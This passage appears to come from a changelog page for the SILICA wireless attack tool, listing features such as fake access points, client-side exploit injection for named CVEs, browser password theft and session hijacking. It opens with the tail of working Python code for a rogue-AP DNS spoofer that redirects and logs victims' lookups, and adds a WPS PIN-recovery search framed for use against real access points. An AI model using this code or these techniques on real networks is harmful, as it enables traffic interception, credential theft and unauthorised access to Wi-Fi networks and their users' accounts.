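    qtype, _qclass = struct.unpack_from("!HH", data, pos)
    pos += 4
    return txid, ".".join(labels), qtype, data[HEADER.size:pos]


def build_answer(query: bytes, answer_ip: str, ttl: int = 60) -> Optional[bytes]:
    """Forge the reply: A queries get answer_ip, everything else an empty NOERROR."""
    parsed = parse_query(query)
    if parsed is None:
        return None
    txid, _name, qtype, question = parsed
    flags = 0x8180                             # QR=1, RD=1, RA=1, RCODE=0
    if qtype != QTYPE_A:
        return HEADER.pack(txid, flags, 1, 0, 0, 0) + question
    # NAME is a pointer (0xC00C) back to the question name; RDATA is the IPv4 address.
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return HEADER.pack(txid, flags, 1, 1, 0, 0) + question + rr


def parse_response(resp: bytes) -> Tuple[int, int, Optional[str]]:
    """(txid, answer count, answered IP or None): what the victim's resolver sees."""
    txid, _flags, _qd, ancount, _, _ = HEADER.unpack_from(resp)
    ip = socket.inet_ntoa(resp[-4:]) if ancount else None
    return txid, ancount, ip


def serve(bind_ip: str, answer_ip: str, port: int = 53) -> None:
    """Run the responder on the fake AP's interface (port 53 needs root)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, client = sock.recvfrom(512)
        resp = build_answer(data, answer_ip)
        if resp is None:
            continue
        print(f"{client[0]} looked up {parse_query(data)[1]!r}")   # what the victim is visiting
        sock.sendto(resp, client)


if __name__ == "__main__":
    serve("10.0.0.1", "10.0.0.1")   # constructed: fake AP's own address on both sides
```

The logged hostnames are themselves useful reconnaissance: they show which services a probing client tries to reach before any credential is captured.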
2012-Jul-20 SILICA v7.11!
+ Saving and loading sessions now also includes the probe window information
+ Ability to run a Fake AP without an internet connection
(checkbox in Preferences)
+ Automatically use the knowledge base for WPS cracking and detect
PIN ranges
+ Reliability fix for capturing WPA handshakes
+ Bug fix for the Fake AP module in Open or WEP mode
2012-Jun-6 SILICA v7.10!
+ Impersonate APs and Ad-Hoc networks using WEP or WPA1/2 encryption
+ Client-side exploit injection for AP and Ad-Hoc mode
+ Password stealing with passive injection for WEP and WPA1/2
encrypted networks
+ Passive client-side exploit injection for WEP and WPA1/2
encrypted networks
+ Custom HTML injection for WEP and WPA1/2 encrypted networks
+ Added support for more popular websites that are vulnerable to the
password stealing attack
2012-Apr-11 SILICA v7.9!
+ Client-side exploit for the Java AtomicReferenceArray type confusion
sandbox bypass (CVE-2012-0507).
* This is handled automatically by SILICA's Man-In-The-Middle,
Fake-AP and custom injection modules.
+ Browser auto-complete attack to retrieve the passwords a browser has
saved
* Supports sites such as Twitter, Facebook, Gmail, LinkedIn,
Pandora, Reddit, RenRen.com, Slashdot.org, Match.com and other popular
sites.
* This is one of the content injection attacks discussed at
INFILTRATE 2012 in Secrets in Your Pocket: Analysis of [Your] Wireless
Data by Mark Wuergler:
* http://www.immunityinc.com/inf
+ Interface
* New column showing information from Cisco access points, such as
the connected clients and hostname
* Info tab storing all passwords SILICA has automatically retrieved
during an attack (e.g. via browser auto-complete)
* New column showing the data activity of APs and clients
You can see the browser auto-complete attack in action at the
following location:
http://partners.immunityinc.co
Other videos can be found at:
http://immunityinc.com/product
If you have any further questions on updating please check our online
manual at: http://www.immunityinc.com/dow
2012-Feb-16 SILICA v7.8!
– Improved WPS attack
+ Shows an estimated completion time
+ Automatic settings: adjusts the delay and the maximum number of threads
the AP can handle, to avoid being blocked
+ Automatically detects an AP lockdown period or crash
+ Shows a tab with known PINs and information about certain APs
+ Resumes WPS sessions from where they left off
+ Source MAC randomization, which evades the slow per-client delays some
APs impose
+ Get WPS info: find out the exact make, model and version of an AP
– Show wireless and wired clients in the client listing
– Added a new, less intrusive method of disconnecting clients
– Option to channel hop only between channels 1-12
Video of new attack:
http://partners.immunityinc.co
2012-Jan-12 SILICA v7.7!
This release includes code to exploit the newly found WPS vulnerability,
which lets SILICA guess the PIN and recover the WPA key of an access point
without following the traditional approach of brute forcing the key. Several
configuration options are in Preferences under the Wireless Cracking section,
which allow resuming a session or specifying PIN ranges if you know what the
vendor commonly uses.
Note that this is an early version of the attack; a better one
with more features will be released soon.
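The reason the WPS PIN can be "guessed" rather than brute forced, and what the later resume, range and ETA options in v7.8 build on, is the split in the WPS exchange: the registrar (AP side) NACKs after M4 when the first four PIN digits are wrong and after M6 when the next three are wrong, and the eighth digit is only a checksum. The worst case is therefore 10^4 + 10^3 = 11,000 exchanges instead of 10^8. The simulation below is an added example written for this page, not SILICA's WPS module; `FakeRegistrar` stands in for a real AP, and the checksum weighting is the one from the WPS specification.

```python
"""WPS PIN split search against a simulated registrar (added example, not SILICA code).

Models the WPS design flaw: M4 feedback confirms the first four PIN digits
on their own, M6 feedback confirms the next three, and digit eight is a
checksum. The search therefore costs at most 10^4 + 10^3 exchanges.
FakeRegistrar is a stand-in for a real AP; nothing here talks to the network.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

# WPS checksum weights over the seven data digits (spec: 3,1,3,1,3,1,3).
WEIGHTS = (3, 1, 3, 1, 3, 1, 3)


def wps_checksum(first7: str) -> int:
    """Checksum digit for a 7-digit PIN prefix."""
    acc = sum(w * int(d) for w, d in zip(WEIGHTS, first7))
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class FakeRegistrar:
    """Stand-in for the AP: answers one whole WPS exchange for a candidate PIN."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("registrar PIN must carry a valid checksum")
        self.pin = pin
        self.exchanges = 0

    def run_exchange(self, candidate: str) -> str:
        self.exchanges += 1
        if candidate[:4] != self.pin[:4]:
            return "M4-NACK"        # first half wrong; second half never checked
        if candidate[4:7] != self.pin[4:7]:
            return "M6-NACK"        # first half right, second half wrong
        return "M7"                 # registrar hands over the WPA credentials


@dataclass
class SearchState:
    """Progress record so a search can be resumed (e.g. after an AP lockdown)."""
    first_half: Optional[str] = None
    next_first: int = 0
    next_second: int = 0
    attempts: int = 0


def recover_pin(reg: FakeRegistrar, state: Optional[SearchState] = None,
                first_range=range(10_000), budget: Optional[int] = None
                ) -> Tuple[Optional[str], SearchState]:
    """Split search: find the first half via M4 feedback, then the second via M6.

    first_range: which 4-digit first halves to try (a known vendor range can
    be tried first). budget: stop after this many attempts in this call and
    hand back a state that resumes the search when passed in again.
    """
    state = state or SearchState()
    if state.first_half is None:
        for i in first_range:
            if i < state.next_first:
                continue                          # already tried before a resume
            if budget is not None and state.attempts >= budget:
                return None, state
            state.next_first = i + 1
            state.attempts += 1
            if reg.run_exchange(f"{i:04d}0000") != "M4-NACK":
                state.first_half = f"{i:04d}"
                break
        else:
            return None, state                    # range exhausted
    for j in range(state.next_second, 1000):
        if budget is not None and state.attempts >= budget:
            return None, state
        state.next_second = j + 1
        state.attempts += 1
        prefix = state.first_half + f"{j:03d}"
        pin = prefix + str(wps_checksum(prefix))  # only checksum-valid PINs are sent
        if reg.run_exchange(pin) == "M7":
            return pin, state
    return None, state


def remaining_worst_case(state: SearchState, first_range=range(10_000)) -> int:
    """Upper bound on attempts still needed; times seconds per attempt gives an ETA."""
    left = 1000 - state.next_second
    if state.first_half is None:
        left += sum(1 for i in first_range if i >= state.next_first)
    return left


if __name__ == "__main__":
    reg = FakeRegistrar("12345670")               # constructed target PIN
    pin, st = recover_pin(reg)
    print(pin, "recovered in", st.attempts, "exchanges, worst case 11000")
```

Against a real AP each exchange takes seconds, and many APs lock WPS after a burst of failures; the `budget` and `SearchState` pair is what a resumable attack needs, and `remaining_worst_case` is all an ETA display requires.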
Have any questions on how to use SILICA? Please check our FAQs or make a
new post in our forum
https://forum.immunityinc.com/
You may find a video of the AP-less WEP cracking at:
http://silica.immunityinc.com/
Other videos can be found at:
Access point impersonation –
http://partners.immunityinc.co
Custom traffic injection –
http://partners.immunityinc.co
General overview –
http://www.immunityinc.com/mov
Wireless Window –
http://www.immunityinc.com/mov
Key retrieval (WEP, LEAP, WPA1,2) –
http://partners.immunityinc.co
Passive session hijacking (facebook, twitter, gmail etc) –
http://partners.immunityinc.co
2011-Nov-23 SILICA v7.6!
SILICA can now recover WEP keys directly from clients by tricking the
client into disclosing the key. This attack does not require an AP to be
present in order to derive the key. See the video below for more details.
You may find a video of the AP-less WEP cracking at:
http://silica.immunityinc.com/
2011-Nov-4 SILICA v7.5!
The new features of this release include:
– New SILICA interface
+ New log window that displays more information about each step SILICA
is performing
+ Added tooltip hints between tabs
+ Displays the quantity of clients connected to each AP
+ Title bar statistics including uptime and the total number of APs,
clients, probes and Ad-Hoc networks
+ Expand/Collapse and Clear contents in the Cookie Viewer and Fake AP tabs
– Ability to resume your actions if you close your lid or
accidentally unplug your wireless card
– Optimized WEP cracking speeds for faster results
– Inject client-side exploits into selected targets that are active in
the Cookie Viewer
– Supply custom access point names to 'become' in Fake AP mode
– Geolocate a MAC address using Google's Geolocation API
– Automatically attempt to gain SYSTEM after a Windows client-side
exploit has succeeded, using a local privilege escalation (MS11-054, null
pointer dereference, CVE-2011-1888)
– Added support for OAuth authentication hijacking to the Cookie Viewer tab
– Ability to clone the MAC address of a client from the WiFi monitor window
2011-Aug-4 SILICA v7.4!
The new features of this release include:
– New Fake AP tab shows all access points that wireless clients are
probing for.
– Access point impersonation.
+ Become an access point that a wireless client is probing for (to force
the client to connect to SILICA).
+ Provide the wireless client with Internet access. 'Passively' steal
cookies and watch all live network traffic in Wireshark.
+ Optionally inject client-side exploits into the browser as the client
browses the Internet (using the new injection module).
– Incorporation of ClientD, a framework that dynamically delivers
client-side exploits.
+ This release of SILICA includes 3 new client-side exploit modules:
* Android parent stylesheet vulnerability, versions 2.1 and 2.2.1
* Adobe Flash Player <= 10.3.181.23 (CVE-2011-2110)
* IE Peers setAttribute (CVE-2010-0806)
– Passive injection
+ Passively inject client-side exploits (using ClientD) or a custom
payload into the browser of wireless clients.
– Updates to the man-in-the-middle with client-side injection module.
+ The victim is now allowed to visit the pages they requested, with only
an added frame that points to ClientD to serve client-side
exploits.
+ Uses the new injection module
You may find videos of the new features of SILICA 7.4 at:
General overview –
http://partners.immunityinc.co
Access point impersonation –
http://partners.immunityinc.co
Custom traffic injection –
http://partners.immunityinc.co
2011-Jun-8 SILICA v7.3!
New features include:
– Locking into a single frequency for monitoring traffic
– Better visualization of discovered SSIDs
– Updated client and AP vendor information
– Column sorting
– Better third-party tool compatibility for loading saved WPA handshake
pcaps
– Bug fixes
You may find videos at:
Hidden SSID and visualization –
http://immunityinc.com/movies/
General overview – http://immunityinc.com/movies/
Wireless Window –
http://www.immunityinc.com/mov
Key retrieval (WEP, LEAP, WPA1,2) –
http://partners.immunityinc.co
Passive session hijacking (facebook, twitter, gmail etc) –
http://partners.immunityinc.co